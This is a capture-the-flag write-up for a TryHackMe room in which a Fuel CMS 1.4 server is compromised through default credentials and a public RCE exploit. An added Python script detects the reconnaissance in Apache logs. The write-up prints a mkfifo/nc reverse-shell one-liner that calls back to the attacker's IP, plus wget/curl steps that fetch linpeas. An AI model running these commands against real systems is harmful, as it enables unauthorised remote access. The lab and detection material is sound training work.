Another room from TryHackMe focusing on exploiting an RCE and a default configuration. The room is rated as Easy on the platform. The room can be accessed here.
As per the room description, we have a newly deployed web server and there seem to be issues with the web server configuration. We are supposed to find the user and the root flag. Let's start with the steps I performed to own the server. The target server IP is 10.10.69.97 and the attacking server IP is 10.13.15.113.
I started with rustscan to quickly find ports open on the server. rustscan -a 10.10.69.97. Only port 80 was found to be open on the target server.
On further service enumeration, we found an Apache httpd server available on port 80. The Apache httpd version was detected as 2.4.18 and the OS was detected as Ubuntu.
I ran directory brute-forcing on port 80 to check for any leakage of sensitive files. I used dirsearch to perform the directory brute-forcing. The result indicated that a robots.txt file is present, and on further enumeration of the file we found that /fuel/ has been marked as disallowed.
On loading the webpage, a login prompt was presented. Based on the community result, I got the default credentials as admin and admin. I attempted to log in and it did work. Enumerating further, I found the Assets menu option, which had an upload capability. After playing for some time with extension bypasses, I had to give up as I had no luck with the available options.
Since I was able to find the CMS version, 1.4, from the default page, I searched whether any public exploits were available on ExploitDB. Fortunately, there were two exploits available, one based on Ruby and the other on Python 2. I picked the Python 2 script and modified it to support Python 3.
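From the defender's side, the enumeration steps above (a dirsearch burst of 404s, a robots.txt read, then requests into the Disallowed /fuel/ path) leave a recognisable trail in the Apache access log. The following Python script is an added example and not part of the original writeup: it runs that detection over constructed sample log lines; the 404 threshold, the time window and the /fuel/ prefix are assumptions chosen for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Apache "combined"-style access log, as written by the httpd serving port 80.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Constructed sample (not taken from the room): a burst of 404s from a directory brute
# force, a robots.txt read, then a POST into the Disallowed /fuel/ path, plus one
# ordinary visitor with a single 404 that must not be flagged.
SAMPLE_LOG = """\
10.13.15.113 - - [10/Mar/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 275
10.13.15.113 - - [10/Mar/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 275
10.13.15.113 - - [10/Mar/2024:10:00:02 +0000] "GET /config HTTP/1.1" 404 275
10.13.15.113 - - [10/Mar/2024:10:00:02 +0000] "GET /old HTTP/1.1" 404 275
10.13.15.113 - - [10/Mar/2024:10:00:03 +0000] "GET /test HTTP/1.1" 404 275
10.13.15.113 - - [10/Mar/2024:10:00:03 +0000] "GET /robots.txt HTTP/1.1" 200 54
10.13.15.113 - - [10/Mar/2024:10:00:40 +0000] "POST /fuel/login HTTP/1.1" 302 0
192.0.2.7 - - [10/Mar/2024:10:05:01 +0000] "GET /favicon.ico HTTP/1.1" 404 275
"""

def parse(log_text):
    # Yield one dict per parseable line, with the timestamp converted to a datetime.
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], TS_FMT)
            yield d

def find_suspicious(log_text, max_404=5, window=timedelta(seconds=60), hidden="/fuel/"):
    """Return {ip: [reasons]} for sources whose requests match the recon pattern."""
    by_ip = defaultdict(list)
    for e in parse(log_text):
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, events in by_ip.items():
        reasons = []
        # 1. Directory brute force: max_404 or more 404 responses inside a single window.
        misses = sorted(e["ts"] for e in events if e["status"] == "404")
        if any(misses[i + max_404 - 1] - misses[i] <= window
               for i in range(len(misses) - max_404 + 1)):
            reasons.append("dir-bruteforce")
        # 2. robots.txt read, followed by a request into the path it marks Disallowed.
        robots = [e["ts"] for e in events if e["path"] == "/robots.txt"]
        if robots and any(e["path"].startswith(hidden) and e["ts"] >= min(robots)
                          for e in events):
            reasons.append("robots-disallowed-path-probe")
        if reasons:
            findings[ip] = reasons
    return findings
```

Pointing the same two rules at a real access log (and at the login path of whatever CMS is deployed) gives an early signal that a default install is being probed, well before the upload or exploit stage.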
After gaining an initial foothold on the server by exploiting the RCE vulnerability, our task is to gain a shell and then look to escalate privileges.
To gain a reverse shell, I took the command from Revshells.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.15.113 4445 >/tmp/f
Once I had a reverse shell, I used a Python one-liner to get a more stable shell.
Now I aimed to look for ways to escalate privileges. I ran linpeas.sh after transferring the file to the target server. I fetched linpeas.sh from GitHub using the snippet below.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh > linpeas.sh
sudo python -m http.server 80 # Executed on my machine to create a web server serving the linpeas.sh script. Ensure the file is in the same directory from which the http server is launched.
wget 10.13.15.113:80/linpeas.sh
Once I had the script, I ran it to enumerate the host and find whether any entry point was available. I did not find any direct hit, but I learned that configuration files are present for the CMS. Also, in the default installation the credentials can be found in database.php.
This room shows how things can go wrong if servers or devices are deployed with the default setup. It is always advisable to change the default parameters as per industry best practices and only then deploy them in the production environment.